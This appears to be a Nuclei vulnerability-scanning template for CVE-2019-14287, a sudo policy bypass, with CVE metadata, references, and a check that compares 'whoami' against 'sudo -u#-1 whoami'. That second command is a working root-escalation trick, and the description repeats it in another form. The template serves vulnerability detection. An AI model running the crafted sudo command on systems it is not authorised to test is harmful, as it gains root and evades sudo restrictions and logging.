id: CVE-2019-14287

info:
  name: Sudo <= 1.8.27 - Security Bypass
  author: daffainfo
  severity: high
  description: |
    In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
    - https://www.exploit-db.com/exploits/47502
    - http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00042.html
    - http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00047.html
    - http://packetstormsecurity.com/files/154853/Slackware-Security-Advisory-sudo-Updates.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2019-14287
    cwe-id: CWE-755
    epss-score: 0.30814
    epss-percentile: 0.96854
    cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: sudo_project
    product: sudo
  tags: packetstorm,cve,cve2019,sudo,code,linux,privesc,local,canonical,sudo_project

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  - engine:
      - sh
      - bash
    source: |
      sudo -u#-1 whoami

    matchers:
      - type: dsl
        dsl:
          - '!contains(code_1_response, "root")'
          - 'contains(code_2_response, "root")'
        condition: and
# digest: 490a0046304402207c6a17c6dcfa5e1c0705af985ede699d418ae7488b1f1a1d29faf8b7dcc7e8920220008d95bc160ad21eb5224ab61a5f4ffc0c7ae1d1b6513f4add54a8e1624df386:922c64590222798bb761d5b6d8e72950